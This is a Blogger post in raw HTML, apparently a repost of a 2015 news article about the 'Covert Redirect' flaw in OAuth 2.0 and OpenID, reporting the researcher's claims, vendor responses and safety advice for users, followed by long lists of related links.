<a href="http://whitehatpost.blog.163.com/blog/static/24223205420155501020837/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://whitehatpost.blog.163.<wbr></wbr>com/blog/static/<wbr></wbr>24223205420155501020837/</span></a></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.inzeed.com/kaleidoscope/computer-security/facebook-open-redirect/">http://www.inzeed.com/kaleidoscope/computer-security/facebook-open-redirect/</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<br />
<div>
</div>
<br />
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com1tag:blogger.com,1999:blog-827796800660023204.post-23419476944006471742015-06-04T08:08:00.001-07:002015-06-04T08:09:26.624-07:00Internet Users Threatened by New Security Flaw, Covert Redirect<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-EZ8bwtLVgz0/VXBc-bKNj0I/AAAAAAAAA98/q4lTiHTDCc4/s1600/dangerous-fingers-hacking-540x334.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="246" src="http://1.bp.blogspot.com/-EZ8bwtLVgz0/VXBc-bKNj0I/AAAAAAAAA98/q4lTiHTDCc4/s400/dangerous-fingers-hacking-540x334.jpg" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
A serious flaw in two widely used security standards could give anyone access to your account information at Google, Microsoft, Facebook, Twitter and many other online services. The flaw, dubbed "Covert Redirect" by its discoverer, exists in two open-source session-authorization protocols, OAuth 2.0 and OpenID.<br />
<br />
<br />
Both standards are employed across the Internet to let users log into websites using their credentials from other sites, such as by logging into a Web forum using a Facebook or Twitter username and password instead of creating a new account just for that forum.<br />
<br />
<br />
Attackers could exploit the flaw to disguise and launch phishing attempts from legitimate websites, said the flaw's finder, Mathematics Ph.D. student <a href="http://tetraph.com/wangjing" target="_blank">Wang Jing</a> of the Nanyang Technological University in Singapore.<br />
<br />
<br />
Wang believes it's unlikely that this flaw will be patched any time soon. He says neither the authentication companies (those with which users have an account, such as Google, Microsoft, Facebook, Twitter or LinkedIn, among others) nor the client companies (sites or apps whose users log in via an account from an authentication company) are taking responsibility for fixing the issue.<br />
<br />
<br />
"The vulnerability is usually due to the existing weakness in the third-party websites," Wang <a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html" target="_blank">writes on his own blog</a>. "However, they have little incentive to fix the problem."<br />
<br />
<br />
The biggest danger of Covert Redirect is that it could be used to conduct <a href="http://tetraph.com/covert_redirect" target="_blank">phishing</a> attacks, in which cybercriminals seize login credentials, by using email messages containing links to malicious websites disguised as something their targets might want to visit.<br />
<br />
<br />
Normal phishing attempts can be easy to spot, because the malicious page's URL will usually be off by a couple of letters from that of the real site. The difference with Covert Redirect is that an attacker could use the real website instead by corrupting the site with a malicious login popup dialogue box.<br />
<br />
<br />
For example, say you regularly visit a given forum (the client company), to which you log in using your credentials from Facebook (the authentication company). Facebook uses OAuth 2.0 to authenticate logins, so an attacker could put a corrupted Facebook login popup box on this forum.<br />
<br />
<br />
If you sign in using that popup box, your Facebook data will be released to the attacker, not to the forum. This means the attacker could possibly gain access to your Facebook account, which he or she could use to <a href="http://www.tomsguide.com/us/scariest-security-threats,review-2144-2.html">s</a>pread more socially engineered attacks to your Facebook friends.<br />
<br />
<br />
Covert Redirect could also be used in redirection attacks, which is when a link takes you to a different page than the one expected.<br />
<br />
<br />
Wang told <a href="http://www.cnet.com/news/serious-security-flaw-in-oauth-and-openid-discovered/">CNET</a> authentication companies should create whitelists — pre-approved lists that block any not on it — of the client companies that are allowed to use OAuth and OpenID to redirect to them. But he said he had contacted a number of these authentication companies, who all shifted blame elsewhere.<br />
<br />
<br />
Wang told CNET Facebook had told him it "understood the risks associated with OAuth 2.0" but that fixing the flaw would be "something that can't be accomplished in the short term." Google and LinkedIn allegedly told Wang they were looking into the issue, while Microsoft said the issue did not exist on its own sites.<br />
<br />
<br />
Covert Redirect appears to exist in the implementations of the OpenID and OAuth standards used on client websites and apps. But because these two standards are open-source and were developed by a group of volunteers, there's no company or dedicated team that could devote itself to fixing the issue.<br />
<br />
<br />
<br />
<br />
<br />
<b>Where does that leave things? </b><br />
"Given the trust users put in Facebook and other major OAuth providers, I think it will be easy for attackers to trick people into giving some access to their personal information stored on those service," Chris Wysopal, chief technology officer of Boston-area security firm Veracode and a member of the legendary 1990s hackerspace the L0pht, told CNET.<br />
<br />
<br />
"It's not easy to fix, and any effective remedies would negatively impact the user experience," Jeremiah Grossman, founder of Santa Clara, Calif.-based WhiteHat Security, told CNET. "Just another example that Web security is fundamentally broken and the powers that be have little incentive to address the inherent flaws."<br />
<br />
<br />
Users should be extra-wary of login popups on Web pages. If you wish to log into a given website, it might be better to use an account specific to that website instead of logging in with Facebook, Twitter, or another authentication company, which would require the use of OAuth and/or OpenID to do.<br />
<br />
<br />
If you think someone has gained access to one of your online accounts, notify the service and change that account's password immediately.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b>Related Articles:</b><br />
<a href="http://www.tomsguide.com/us/facebook-google-covert-redirect-flaw,news-18726.html">http://www.tomsguide.com/us/facebook-google-covert-redirect-flaw,news-18726.html</a><br />
<a href="http://www.scmagazine.com/covert-redirect-vulnerability-impacts-oauth-20-openid/article/345407/">http://www.scmagazine.com/covert-redirect-vulnerability-impacts-oauth-20-openid/article/345407/</a><br />
<a href="http://news.yahoo.com/facebook-google-users-threatened-security-192547549.html">http://news.yahoo.com/facebook-google-users-threatened-security-192547549.html</a><br />
<a href="http://thehackernews.com/2014/05/nasty-covert-redirect-vulnerability.html">http://thehackernews.com/2014/05/nasty-covert-redirect-vulnerability.html</a><br />
<a href="http://www.foxnews.com/tech/2014/05/05/facebook-google-users-threatened-by-new-security-flaw/">http://www.foxnews.com/tech/2014/05/05/facebook-google-users-threatened-by-new-security-flaw/</a><br />
<a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html">http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html</a><br />
<a href="http://whitehatview.tumblr.com/post/120695795041">http://whitehatview.tumblr.com/post/120695795041</a><br />
<a href="http://russiapost.blogspot.ru/2015/05/openid-oauth-20.html">http://russiapost.blogspot.ru/2015/05/openid-oauth-20.html</a><br />
<a href="http://diebiyi.com/articles/security/covert-redirect/covert_redirect/">http://www.diebiyi.com/articles/security/covert-redirect/covert_redirect/</a><br />
<a href="http://whitehatpost.lofter.com/post/1cc773c8_706b622">http://whitehatpost.lofter.com/post/1cc773c8_706b622</a><br />
<a href="https://itswift.wordpress.com/2014/05/06/microsoft-google-facebook-attacked/">https://itswift.wordpress.com/2014/05/06/microsoft-google-facebook-attacked/</a><br />
<a href="http://tetraph.blog.163.com/blog/static/2346030512015420103814617/">http://tetraph.blog.163.com/blog/static/2346030512015420103814617/</a><br />
<a href="http://itsecurity.lofter.com/post/1cfbf9e7_72e2dbe">http://itsecurity.lofter.com/post/1cfbf9e7_72e2dbe</a><br />
<a href="http://ithut.tumblr.com/post/119493304233/securitypost-une-faille-dans-lintegration">http://ithut.tumblr.com/post/119493304233/securitypost-une-faille-dans-lintegration</a><br />
<a href="http://japanbroad.blogspot.jp/2015/05/oauthopenid-facebook.html">http://japanbroad.blogspot.jp/2015/05/oauthopenid-facebook.html</a><br />
<a href="http://webtech.lofter.com/post/1cd3e0d3_6f0f291">http://webtech.lofter.com/post/1cd3e0d3_6f0f291</a><br />
<a href="https://webtechwire.wordpress.com/2014/05/11/covert-redirect-attack-worldwide/">https://webtechwire.wordpress.com/2014/05/11/covert-redirect-attack-worldwide/</a><br />
<a href="http://whitehatview.tumblr.com/post/119489968576/securitypost-sicherheitslucke-in-oauth-2-0-und">http://whitehatview.tumblr.com/post/119489968576/securitypost-sicherheitslucke-in-oauth-2-0-und</a><br />
<a href="http://www.inzeed.com/kaleidoscope/computer-security/facebook-google-attack/">http://www.inzeed.com/kaleidoscope/computer-security/facebook-google-attack/</a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0